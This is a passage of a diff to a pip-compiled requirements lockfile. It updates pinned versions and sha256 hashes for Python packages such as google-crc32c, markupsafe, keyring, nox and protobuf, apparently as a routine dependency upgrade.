--hash=sha256:74dea7751d98034887dbd821b7aae3e1d36eda111d6ca36c206c44478035709c \ - --hash=sha256:759ce4851a4bb15ecabae28f4d2e18983c244eddd767f560165563bf9aefbc8d \ - --hash=sha256:77e2fd3057c9d78e225fa0a2160f96b64a824de17840351b26825b0848022906 \ - --hash=sha256:7c074fece789b5034b9b1404a1f8208fc2d4c6ce9decdd16e8220c5a793e6f61 \ - --hash=sha256:7c42c70cd1d362284289c6273adda4c6af8039a8ae12dc451dcd61cdabb8ab57 \ - --hash=sha256:7f57f14606cd1dd0f0de396e1e53824c371e9544a822648cd76c034d209b559c \ - --hash=sha256:83c681c526a3439b5cf94f7420471705bbf96262f49a6fe546a6db5f687a3d4a \ - --hash=sha256:8485b340a6a9e76c62a7dce3c98e5f102c9219f4cfbf896a00cf48caf078d438 \ - --hash=sha256:84e6e8cd997930fc66d5bb4fde61e2b62ba19d62b7abd7a69920406f9ecca946 \ - --hash=sha256:89284716bc6a5a415d4eaa11b1726d2d60a0cd12aadf5439828353662ede9dd7 \ - --hash=sha256:8b87e1a59c38f275c0e3676fc2ab6d59eccecfd460be267ac360cc31f7bcde96 \ - --hash=sha256:8f24ed114432de109aa9fd317278518a5af2d31ac2ea6b952b2f7782b43da091 \ - 
--hash=sha256:98cb4d057f285bd80d8778ebc4fde6b4d509ac3f331758fb1528b733215443ae \ - --hash=sha256:998679bf62b7fb599d2878aa3ed06b9ce688b8974893e7223c60db155f26bd8d \ - --hash=sha256:9ba053c5f50430a3fcfd36f75aff9caeba0440b2d076afdb79a318d6ca245f88 \ - --hash=sha256:9c99616c853bb585301df6de07ca2cadad344fd1ada6d62bb30aec05219c45d2 \ - --hash=sha256:a1fd716e7a01f8e717490fbe2e431d2905ab8aa598b9b12f8d10abebb36b04dd \ - --hash=sha256:a2355cba1f4ad8b6988a4ca3feed5bff33f6af2d7f134852cf279c2aebfde541 \ - --hash=sha256:b1f8133c9a275df5613a451e73f36c2aea4fe13c5c8997e22cf355ebd7bd0728 \ - --hash=sha256:b8667b48e7a7ef66afba2c81e1094ef526388d35b873966d8a9a447974ed9178 \ - --hash=sha256:ba1eb1843304b1e5537e1fca632fa894d6f6deca8d6389636ee5b4797affb968 \ - --hash=sha256:be82c3c8cfb15b30f36768797a640e800513793d6ae1724aaaafe5bf86f8f346 \ - --hash=sha256:c02ec1c5856179f171e032a31d6f8bf84e5a75c45c33b2e20a3de353b266ebd8 \ - --hash=sha256:c672d99a345849301784604bfeaeba4db0c7aae50b95be04dd651fd2a7310b93 \ - --hash=sha256:c6c777a480337ac14f38564ac88ae82d4cd238bf293f0a22295b66eb89ffced7 \ - --hash=sha256:cae0274952c079886567f3f4f685bcaf5708f0a23a5f5216fdab71f81a6c0273 \ - --hash=sha256:cd67cf24a553339d5062eff51013780a00d6f97a39ca062781d06b3a73b15462 \ - --hash=sha256:d3515f198eaa2f0ed49f8819d5732d70698c3fa37384146079b3799b97667a94 \ - --hash=sha256:d5280312b9af0976231f9e317c20e4a61cd2f9629b7bfea6a693d1878a264ebd \ - --hash=sha256:de06adc872bcd8c2a4e0dc51250e9e65ef2ca91be023b9d13ebd67c2ba552e1e \ - --hash=sha256:e1674e4307fa3024fc897ca774e9c7562c957af85df55efe2988ed9056dc4e57 \ - --hash=sha256:e2096eddb4e7c7bdae4bd69ad364e55e07b8316653234a56552d9c988bd2d61b \ - --hash=sha256:e560628513ed34759456a416bf86b54b2476c59144a9138165c9a1575801d0d9 \ - --hash=sha256:edfedb64740750e1a3b16152620220f51d58ff1b4abceb339ca92e934775c27a \ - --hash=sha256:f13cae8cc389a440def0c8c52057f37359014ccbc9dc1f0827936bcd367c6100 \ - --hash=sha256:f314013e7dcd5cf45ab1945d92e713eec788166262ae8deb2cfacd53def27325 \ - 
--hash=sha256:f583edb943cf2e09c60441b910d6a20b4d9d626c75a36c8fcac01a6c96c01183 \ - --hash=sha256:fd8536e902db7e365f49e7d9029283403974ccf29b13fc7028b97e2295b33556 \ - --hash=sha256:fe70e325aa68fa4b5edf7d1a4b6f691eb04bbccac0ace68e34820d283b5f80d4 +google-crc32c==1.6.0 \ + --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ + --hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ + --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ + --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ + --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ + --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ + --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ + --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ + --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ + --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ + --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ + --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ + --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ + --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ + --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ + --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ + --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ + --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ + --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ + --hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ + 
--hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ + --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ + --hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ + --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ + --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ + --hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ + --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 # via # google-cloud-storage # google-resumable-media -google-resumable-media==2.7.1 \ - --hash=sha256:103ebc4ba331ab1bfdac0250f8033627a2cd7cde09e7ccff9181e31ba4315b2c \ - --hash=sha256:eae451a7b2e2cdbaaa0fd2eb00cc8a1ee5e95e16b55597359cbc3d27d7d90e33 +google-resumable-media==2.7.2 \ + --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ + --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 # via google-cloud-storage -googleapis-common-protos==1.63.2 \ - --hash=sha256:27a2499c7e8aff199665b22741997e485eccc8645aa9176c7c988e6fae507945 \ - --hash=sha256:27c5abdffc4911f28101e635de1533fb4cfd2c37fbaa9174587c799fac90aa87 +googleapis-common-protos==1.65.0 \ + --hash=sha256:2972e6c496f435b92590fd54045060867f3fe9be2c82ab148fc8885035479a63 \ + --hash=sha256:334a29d07cddc3aa01dee4988f9afd9b2916ee2ff49d6b757155dc0d197852c0 # via google-api-core -idna==3.7 \ - --hash=sha256:028ff3aadf0609c1fd278d8ea3089299412a7a8b9bd005dd08b9f8285bcb5cfc \ - --hash=sha256:82fee1fc78add43492d3a1898bfa6d8a904cc97d8427f683ed8e798d07761aa0 +idna==3.10 \ + --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ + --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 # via requests -importlib-metadata==8.0.0 \ - --hash=sha256:15584cf2b1bf449d98ff8a6ff1abef57bf20f3ac6454f431736cd3e660921b2f \ - 
--hash=sha256:188bd24e4c346d3f0a933f275c2fec67050326a856b9a359881d7c2a697e8812 +importlib-metadata==8.5.0 \ + --hash=sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b \ + --hash=sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7 # via # -r requirements.in # keyring @@ -271,13 +240,13 @@ jaraco-classes==3.4.0 \ --hash=sha256:47a024b51d0239c0dd8c8540c6c7f484be3b8fcf0b2d85c13825780d3b3f3acd \ --hash=sha256:f662826b6bed8cace05e7ff873ce0f9283b5c924470fe664fff1c2f00f581790 # via keyring -jaraco-context==5.3.0 \ - --hash=sha256:3e16388f7da43d384a1a7cd3452e72e14732ac9fe459678773a3608a812bf266 \ - --hash=sha256:c2f67165ce1f9be20f32f650f25d8edfc1646a8aeee48ae06fb35f90763576d2 +jaraco-context==6.0.1 \ + --hash=sha256:9bae4ea555cf0b14938dc0aee7c9f32ed303aa20a3b73e7dc80111628792d1b3 \ + --hash=sha256:f797fc481b490edb305122c9181830a3a5b76d84ef6d1aef2fb9b47ab956f9e4 # via keyring -jaraco-functools==4.0.1 \ - --hash=sha256:3b24ccb921d6b593bdceb56ce14799204f473976e2a9d4b15b04d0f2c2326664 \ - --hash=sha256:d33fa765374c0611b52f8b3a795f8900869aa88c84769d4d1746cd68fb28c3e8 +jaraco-functools==4.1.0 \ + --hash=sha256:70f7e0e2ae076498e212562325e805204fc092d7b4c17e0e86c959e249701a9d \ + --hash=sha256:ad159f13428bc4acbf5541ad6dec511f91573b90fba04df61dafa2a1231cf649 # via keyring jeepney==0.8.0 \ --hash=sha256:5efe48d255973902f6badc3ce55e2aa6c5c3b3bc642059ef3a91247bcfcc5806 \ @@ -289,9 +258,9 @@ jinja2==3.1.4 \ --hash=sha256:4a3aee7acbbe7303aede8e9648d13b8bf88a429282aa6122a993f0ac800cb369 \ --hash=sha256:bc5dd2abb727a5319567b7a813e6a2e7318c39f4f487cfe6c89c6f9c7d25197d # via gcp-releasetool -keyring==25.2.1 \ - --hash=sha256:2458681cdefc0dbc0b7eb6cf75d0b98e59f9ad9b2d4edd319d18f68bdca95e50 \ - --hash=sha256:daaffd42dbda25ddafb1ad5fec4024e5bbcfe424597ca1ca452b299861e49f1b +keyring==25.4.1 \ + --hash=sha256:5426f817cf7f6f007ba5ec722b1bcad95a75b27d780343772ad76b17cb47b0bf \ + --hash=sha256:b07ebc55f3e8ed86ac81dd31ef14e81ace9dd9c3d4b5d77a6e9a2016d0d71a1b 
# via # gcp-releasetool # twine @@ -299,75 +268,76 @@ markdown-it-py==3.0.0 \ --hash=sha256:355216845c60bd96232cd8d8c40e8f9765cc86f46880e43a8fd22dc1a1a8cab1 \ --hash=sha256:e3f60a94fa066dc52ec76661e37c851cb232d92f9886b15cb560aaada2df8feb # via rich -markupsafe==2.1.5 \ - --hash=sha256:00e046b6dd71aa03a41079792f8473dc494d564611a8f89bbbd7cb93295ebdcf \ - --hash=sha256:075202fa5b72c86ad32dc7d0b56024ebdbcf2048c0ba09f1cde31bfdd57bcfff \ - --hash=sha256:0e397ac966fdf721b2c528cf028494e86172b4feba51d65f81ffd65c63798f3f \ - --hash=sha256:17b950fccb810b3293638215058e432159d2b71005c74371d784862b7e4683f3 \ - --hash=sha256:1f3fbcb7ef1f16e48246f704ab79d79da8a46891e2da03f8783a5b6fa41a9532 \ - --hash=sha256:2174c595a0d73a3080ca3257b40096db99799265e1c27cc5a610743acd86d62f \ - --hash=sha256:2b7c57a4dfc4f16f7142221afe5ba4e093e09e728ca65c51f5620c9aaeb9a617 \ - --hash=sha256:2d2d793e36e230fd32babe143b04cec8a8b3eb8a3122d2aceb4a371e6b09b8df \ - --hash=sha256:30b600cf0a7ac9234b2638fbc0fb6158ba5bdcdf46aeb631ead21248b9affbc4 \ - --hash=sha256:397081c1a0bfb5124355710fe79478cdbeb39626492b15d399526ae53422b906 \ - --hash=sha256:3a57fdd7ce31c7ff06cdfbf31dafa96cc533c21e443d57f5b1ecc6cdc668ec7f \ - --hash=sha256:3c6b973f22eb18a789b1460b4b91bf04ae3f0c4234a0a6aa6b0a92f6f7b951d4 \ - --hash=sha256:3e53af139f8579a6d5f7b76549125f0d94d7e630761a2111bc431fd820e163b8 \ - --hash=sha256:4096e9de5c6fdf43fb4f04c26fb114f61ef0bf2e5604b6ee3019d51b69e8c371 \ - --hash=sha256:4275d846e41ecefa46e2015117a9f491e57a71ddd59bbead77e904dc02b1bed2 \ - --hash=sha256:4c31f53cdae6ecfa91a77820e8b151dba54ab528ba65dfd235c80b086d68a465 \ - --hash=sha256:4f11aa001c540f62c6166c7726f71f7573b52c68c31f014c25cc7901deea0b52 \ - --hash=sha256:5049256f536511ee3f7e1b3f87d1d1209d327e818e6ae1365e8653d7e3abb6a6 \ - --hash=sha256:58c98fee265677f63a4385256a6d7683ab1832f3ddd1e66fe948d5880c21a169 \ - --hash=sha256:598e3276b64aff0e7b3451b72e94fa3c238d452e7ddcd893c3ab324717456bad \ - 
--hash=sha256:5b7b716f97b52c5a14bffdf688f971b2d5ef4029127f1ad7a513973cfd818df2 \ - --hash=sha256:5dedb4db619ba5a2787a94d877bc8ffc0566f92a01c0ef214865e54ecc9ee5e0 \ - --hash=sha256:619bc166c4f2de5caa5a633b8b7326fbe98e0ccbfacabd87268a2b15ff73a029 \ - --hash=sha256:629ddd2ca402ae6dbedfceeba9c46d5f7b2a61d9749597d4307f943ef198fc1f \ - --hash=sha256:656f7526c69fac7f600bd1f400991cc282b417d17539a1b228617081106feb4a \ - --hash=sha256:6ec585f69cec0aa07d945b20805be741395e28ac1627333b1c5b0105962ffced \ - --hash=sha256:72b6be590cc35924b02c78ef34b467da4ba07e4e0f0454a2c5907f473fc50ce5 \ - --hash=sha256:7502934a33b54030eaf1194c21c692a534196063db72176b0c4028e140f8f32c \ - --hash=sha256:7a68b554d356a91cce1236aa7682dc01df0edba8d043fd1ce607c49dd3c1edcf \ - --hash=sha256:7b2e5a267c855eea6b4283940daa6e88a285f5f2a67f2220203786dfa59b37e9 \ - --hash=sha256:823b65d8706e32ad2df51ed89496147a42a2a6e01c13cfb6ffb8b1e92bc910bb \ - --hash=sha256:8590b4ae07a35970728874632fed7bd57b26b0102df2d2b233b6d9d82f6c62ad \ - --hash=sha256:8dd717634f5a044f860435c1d8c16a270ddf0ef8588d4887037c5028b859b0c3 \ - --hash=sha256:8dec4936e9c3100156f8a2dc89c4b88d5c435175ff03413b443469c7c8c5f4d1 \ - --hash=sha256:97cafb1f3cbcd3fd2b6fbfb99ae11cdb14deea0736fc2b0952ee177f2b813a46 \ - --hash=sha256:a17a92de5231666cfbe003f0e4b9b3a7ae3afb1ec2845aadc2bacc93ff85febc \ - --hash=sha256:a549b9c31bec33820e885335b451286e2969a2d9e24879f83fe904a5ce59d70a \ - --hash=sha256:ac07bad82163452a6884fe8fa0963fb98c2346ba78d779ec06bd7a6262132aee \ - --hash=sha256:ae2ad8ae6ebee9d2d94b17fb62763125f3f374c25618198f40cbb8b525411900 \ - --hash=sha256:b91c037585eba9095565a3556f611e3cbfaa42ca1e865f7b8015fe5c7336d5a5 \ - --hash=sha256:bc1667f8b83f48511b94671e0e441401371dfd0f0a795c7daa4a3cd1dde55bea \ - --hash=sha256:bec0a414d016ac1a18862a519e54b2fd0fc8bbfd6890376898a6c0891dd82e9f \ - --hash=sha256:bf50cd79a75d181c9181df03572cdce0fbb75cc353bc350712073108cba98de5 \ - --hash=sha256:bff1b4290a66b490a2f4719358c0cdcd9bafb6b8f061e45c7a2460866bf50c2e \ - 
--hash=sha256:c061bb86a71b42465156a3ee7bd58c8c2ceacdbeb95d05a99893e08b8467359a \ - --hash=sha256:c8b29db45f8fe46ad280a7294f5c3ec36dbac9491f2d1c17345be8e69cc5928f \ - --hash=sha256:ce409136744f6521e39fd8e2a24c53fa18ad67aa5bc7c2cf83645cce5b5c4e50 \ - --hash=sha256:d050b3361367a06d752db6ead6e7edeb0009be66bc3bae0ee9d97fb326badc2a \ - --hash=sha256:d283d37a890ba4c1ae73ffadf8046435c76e7bc2247bbb63c00bd1a709c6544b \ - --hash=sha256:d9fad5155d72433c921b782e58892377c44bd6252b5af2f67f16b194987338a4 \ - --hash=sha256:daa4ee5a243f0f20d528d939d06670a298dd39b1ad5f8a72a4275124a7819eff \ - --hash=sha256:db0b55e0f3cc0be60c1f19efdde9a637c32740486004f20d1cff53c3c0ece4d2 \ - --hash=sha256:e61659ba32cf2cf1481e575d0462554625196a1f2fc06a1c777d3f48e8865d46 \ - --hash=sha256:ea3d8a3d18833cf4304cd2fc9cbb1efe188ca9b5efef2bdac7adc20594a0e46b \ - --hash=sha256:ec6a563cff360b50eed26f13adc43e61bc0c04d94b8be985e6fb24b81f6dcfdf \ - --hash=sha256:f5dfb42c4604dddc8e4305050aa6deb084540643ed5804d7455b5df8fe16f5e5 \ - --hash=sha256:fa173ec60341d6bb97a89f5ea19c85c5643c1e7dedebc22f5181eb73573142c5 \ - --hash=sha256:fa9db3f79de01457b03d4f01b34cf91bc0048eb2c3846ff26f66687c2f6d16ab \ - --hash=sha256:fce659a462a1be54d2ffcacea5e3ba2d74daa74f30f5f143fe0c58636e355fdd \ - --hash=sha256:ffee1f21e5ef0d712f9033568f8344d5da8cc2869dbd08d87c84656e6a2d2f68 +markupsafe==3.0.1 \ + --hash=sha256:0778de17cff1acaeccc3ff30cd99a3fd5c50fc58ad3d6c0e0c4c58092b859396 \ + --hash=sha256:0f84af7e813784feb4d5e4ff7db633aba6c8ca64a833f61d8e4eade234ef0c38 \ + --hash=sha256:17b2aea42a7280db02ac644db1d634ad47dcc96faf38ab304fe26ba2680d359a \ + --hash=sha256:242d6860f1fd9191aef5fae22b51c5c19767f93fb9ead4d21924e0bcb17619d8 \ + --hash=sha256:244dbe463d5fb6d7ce161301a03a6fe744dac9072328ba9fc82289238582697b \ + --hash=sha256:26627785a54a947f6d7336ce5963569b5d75614619e75193bdb4e06e21d447ad \ + --hash=sha256:2a4b34a8d14649315c4bc26bbfa352663eb51d146e35eef231dd739d54a5430a \ + 
--hash=sha256:2ae99f31f47d849758a687102afdd05bd3d3ff7dbab0a8f1587981b58a76152a \ + --hash=sha256:312387403cd40699ab91d50735ea7a507b788091c416dd007eac54434aee51da \ + --hash=sha256:3341c043c37d78cc5ae6e3e305e988532b072329639007fd408a476642a89fd6 \ + --hash=sha256:33d1c36b90e570ba7785dacd1faaf091203d9942bc036118fab8110a401eb1a8 \ + --hash=sha256:3e683ee4f5d0fa2dde4db77ed8dd8a876686e3fc417655c2ece9a90576905344 \ + --hash=sha256:3ffb4a8e7d46ed96ae48805746755fadd0909fea2306f93d5d8233ba23dda12a \ + --hash=sha256:40621d60d0e58aa573b68ac5e2d6b20d44392878e0bfc159012a5787c4e35bc8 \ + --hash=sha256:40f1e10d51c92859765522cbd79c5c8989f40f0419614bcdc5015e7b6bf97fc5 \ + --hash=sha256:45d42d132cff577c92bfba536aefcfea7e26efb975bd455db4e6602f5c9f45e7 \ + --hash=sha256:48488d999ed50ba8d38c581d67e496f955821dc183883550a6fbc7f1aefdc170 \ + --hash=sha256:4935dd7883f1d50e2ffecca0aa33dc1946a94c8f3fdafb8df5c330e48f71b132 \ + --hash=sha256:4c2d64fdba74ad16138300815cfdc6ab2f4647e23ced81f59e940d7d4a1469d9 \ + --hash=sha256:4c8817557d0de9349109acb38b9dd570b03cc5014e8aabf1cbddc6e81005becd \ + --hash=sha256:4ffaaac913c3f7345579db4f33b0020db693f302ca5137f106060316761beea9 \ + --hash=sha256:5a4cb365cb49b750bdb60b846b0c0bc49ed62e59a76635095a179d440540c346 \ + --hash=sha256:62fada2c942702ef8952754abfc1a9f7658a4d5460fabe95ac7ec2cbe0d02abc \ + --hash=sha256:67c519635a4f64e495c50e3107d9b4075aec33634272b5db1cde839e07367589 \ + --hash=sha256:6a54c43d3ec4cf2a39f4387ad044221c66a376e58c0d0e971d47c475ba79c6b5 \ + --hash=sha256:7044312a928a66a4c2a22644147bc61a199c1709712069a344a3fb5cfcf16915 \ + --hash=sha256:730d86af59e0e43ce277bb83970530dd223bf7f2a838e086b50affa6ec5f9295 \ + --hash=sha256:800100d45176652ded796134277ecb13640c1a537cad3b8b53da45aa96330453 \ + --hash=sha256:80fcbf3add8790caddfab6764bde258b5d09aefbe9169c183f88a7410f0f6dea \ + --hash=sha256:82b5dba6eb1bcc29cc305a18a3c5365d2af06ee71b123216416f7e20d2a84e5b \ + --hash=sha256:852dc840f6d7c985603e60b5deaae1d89c56cb038b577f6b5b8c808c97580f1d \ + 
--hash=sha256:8ad4ad1429cd4f315f32ef263c1342166695fad76c100c5d979c45d5570ed58b \ + --hash=sha256:8ae369e84466aa70f3154ee23c1451fda10a8ee1b63923ce76667e3077f2b0c4 \ + --hash=sha256:93e8248d650e7e9d49e8251f883eed60ecbc0e8ffd6349e18550925e31bd029b \ + --hash=sha256:973a371a55ce9ed333a3a0f8e0bcfae9e0d637711534bcb11e130af2ab9334e7 \ + --hash=sha256:9ba25a71ebf05b9bb0e2ae99f8bc08a07ee8e98c612175087112656ca0f5c8bf \ + --hash=sha256:a10860e00ded1dd0a65b83e717af28845bb7bd16d8ace40fe5531491de76b79f \ + --hash=sha256:a4792d3b3a6dfafefdf8e937f14906a51bd27025a36f4b188728a73382231d91 \ + --hash=sha256:a7420ceda262dbb4b8d839a4ec63d61c261e4e77677ed7c66c99f4e7cb5030dd \ + --hash=sha256:ad91738f14eb8da0ff82f2acd0098b6257621410dcbd4df20aaa5b4233d75a50 \ + --hash=sha256:b6a387d61fe41cdf7ea95b38e9af11cfb1a63499af2759444b99185c4ab33f5b \ + --hash=sha256:b954093679d5750495725ea6f88409946d69cfb25ea7b4c846eef5044194f583 \ + --hash=sha256:bbde71a705f8e9e4c3e9e33db69341d040c827c7afa6789b14c6e16776074f5a \ + --hash=sha256:beeebf760a9c1f4c07ef6a53465e8cfa776ea6a2021eda0d0417ec41043fe984 \ + --hash=sha256:c91b394f7601438ff79a4b93d16be92f216adb57d813a78be4446fe0f6bc2d8c \ + --hash=sha256:c97ff7fedf56d86bae92fa0a646ce1a0ec7509a7578e1ed238731ba13aabcd1c \ + --hash=sha256:cb53e2a99df28eee3b5f4fea166020d3ef9116fdc5764bc5117486e6d1211b25 \ + --hash=sha256:cbf445eb5628981a80f54087f9acdbf84f9b7d862756110d172993b9a5ae81aa \ + --hash=sha256:d06b24c686a34c86c8c1fba923181eae6b10565e4d80bdd7bc1c8e2f11247aa4 \ + --hash=sha256:d98e66a24497637dd31ccab090b34392dddb1f2f811c4b4cd80c230205c074a3 \ + --hash=sha256:db15ce28e1e127a0013dfb8ac243a8e392db8c61eae113337536edb28bdc1f97 \ + --hash=sha256:db842712984e91707437461930e6011e60b39136c7331e971952bb30465bc1a1 \ + --hash=sha256:e24bfe89c6ac4c31792793ad9f861b8f6dc4546ac6dc8f1c9083c7c4f2b335cd \ + --hash=sha256:e81c52638315ff4ac1b533d427f50bc0afc746deb949210bc85f05d4f15fd772 \ + --hash=sha256:e9393357f19954248b00bed7c56f29a25c930593a77630c719653d51e7669c2a \ + 
--hash=sha256:ee3941769bd2522fe39222206f6dd97ae83c442a94c90f2b7a25d847d40f4729 \ + --hash=sha256:f31ae06f1328595d762c9a2bf29dafd8621c7d3adc130cbb46278079758779ca \ + --hash=sha256:f94190df587738280d544971500b9cafc9b950d32efcb1fba9ac10d84e6aa4e6 \ + --hash=sha256:fa7d686ed9883f3d664d39d5a8e74d3c5f63e603c2e3ff0abcba23eac6542635 \ + --hash=sha256:fb532dd9900381d2e8f48172ddc5a59db4c445a11b9fab40b3b786da40d3b56b \ + --hash=sha256:fe32482b37b4b00c7a52a07211b479653b7fe4f22b2e481b9a9b099d8a430f2f # via jinja2 mdurl==0.1.2 \ --hash=sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8 \ --hash=sha256:bb413d29f5eea38f31dd4754dd7377d4465116fb207585f97bf925588687c1ba # via markdown-it-py -more-itertools==10.3.0 \ - --hash=sha256:e5d93ef411224fbcef366a6e8ddc4c5781bc6359d43412a65dd5964e46111463 \ - --hash=sha256:ea6a02e24a9161e51faad17a8782b92a0df82c12c1c8886fec7f0c3fa1a1b320 +more-itertools==10.5.0 \ + --hash=sha256:037b0d3203ce90cca8ab1defbbdac29d5f993fc20131f3664dc8d6acfa872aef \ + --hash=sha256:5482bfef7849c25dc3c6dd53a6173ae4795da2a41a80faea6700d9f5846c5da6 # via # jaraco-classes # jaraco-functools @@ -389,9 +359,9 @@ nh3==0.2.18 \ --hash=sha256:de3ceed6e661954871d6cd78b410213bdcb136f79aafe22aa7182e028b8c7307 \ --hash=sha256:f0eca9ca8628dbb4e916ae2491d72957fdd35f7a5d326b7032a345f111ac07fe # via readme-renderer -nox==2024.4.15 \ - --hash=sha256:6492236efa15a460ecb98e7b67562a28b70da006ab0be164e8821177577c0565 \ - --hash=sha256:ecf6700199cdfa9e5ea0a41ff5e6ef4641d09508eda6edb89d9987864115817f +nox==2024.10.9 \ + --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ + --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 # via -r requirements.in packaging==24.1 \ --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ @@ -403,41 +373,41 @@ pkginfo==1.10.0 \ --hash=sha256:5df73835398d10db79f8eecd5cd86b1f6d29317589ea70796994d49399af6297 \ 
--hash=sha256:889a6da2ed7ffc58ab5b900d888ddce90bce912f2d2de1dc1c26f4cb9fe65097 # via twine -platformdirs==4.2.2 \ - --hash=sha256:2d7a1657e36a80ea911db832a8a6ece5ee53d8de21edd5cc5879af6530b1bfee \ - --hash=sha256:38b7b51f512eed9e84a22788b4bce1de17c0adb134d6becb09836e37d8654cd3 +platformdirs==4.3.6 \ + --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ + --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv proto-plus==1.24.0 \ --hash=sha256:30b72a5ecafe4406b0d339db35b56c4059064e69227b8c3bda7462397f966445 \ --hash=sha256:402576830425e5f6ce4c2a6702400ac79897dab0b4343821aa5188b0fab81a12 # via google-api-core -protobuf==5.27.2 \ - --hash=sha256:0e341109c609749d501986b835f667c6e1e24531096cff9d34ae411595e26505 \ - --hash=sha256:176c12b1f1c880bf7a76d9f7c75822b6a2bc3db2d28baa4d300e8ce4cde7409b \ - --hash=sha256:354d84fac2b0d76062e9b3221f4abbbacdfd2a4d8af36bab0474f3a0bb30ab38 \ - --hash=sha256:4fadd8d83e1992eed0248bc50a4a6361dc31bcccc84388c54c86e530b7f58863 \ - --hash=sha256:54330f07e4949d09614707c48b06d1a22f8ffb5763c159efd5c0928326a91470 \ - --hash=sha256:610e700f02469c4a997e58e328cac6f305f649826853813177e6290416e846c6 \ - --hash=sha256:7fc3add9e6003e026da5fc9e59b131b8f22b428b991ccd53e2af8071687b4fce \ - --hash=sha256:9e8f199bf7f97bd7ecebffcae45ebf9527603549b2b562df0fbc6d4d688f14ca \ - --hash=sha256:a109916aaac42bff84702fb5187f3edadbc7c97fc2c99c5ff81dd15dcce0d1e5 \ - --hash=sha256:b848dbe1d57ed7c191dfc4ea64b8b004a3f9ece4bf4d0d80a367b76df20bf36e \ - --hash=sha256:f3ecdef226b9af856075f28227ff2c90ce3a594d092c39bee5513573f25e2714 +protobuf==5.28.2 \ + --hash=sha256:2c69461a7fcc8e24be697624c09a839976d82ae75062b11a0972e41fd2cd9132 \ + --hash=sha256:35cfcb15f213449af7ff6198d6eb5f739c37d7e4f1c09b5d0641babf2cc0c68f \ + --hash=sha256:52235802093bd8a2811abbe8bf0ab9c5f54cca0a751fdd3f6ac2a21438bffece \ + --hash=sha256:59379674ff119717404f7454647913787034f03fe7049cbef1d74a97bb4593f0 \ + 
--hash=sha256:5e8a95246d581eef20471b5d5ba010d55f66740942b95ba9b872d918c459452f \ + --hash=sha256:87317e9bcda04a32f2ee82089a204d3a2f0d3c8aeed16568c7daf4756e4f1fe0 \ + --hash=sha256:8ddc60bf374785fb7cb12510b267f59067fa10087325b8e1855b898a0d81d276 \ + --hash=sha256:a8b9403fc70764b08d2f593ce44f1d2920c5077bf7d311fefec999f8c40f78b7 \ + --hash=sha256:c0ea0123dac3399a2eeb1a1443d82b7afc9ff40241433296769f7da42d142ec3 \ + --hash=sha256:ca53faf29896c526863366a52a8f4d88e69cd04ec9571ed6082fa117fac3ab36 \ + --hash=sha256:eeea10f3dc0ac7e6b4933d32db20662902b4ab81bf28df12218aa389e9c2102d # via # gcp-docuploader # gcp-releasetool # google-api-core # googleapis-common-protos # proto-plus -pyasn1==0.6.0 \ - --hash=sha256:3a35ab2c4b5ef98e17dfdec8ab074046fbda76e281c5a706ccd82328cfc8f64c \ - 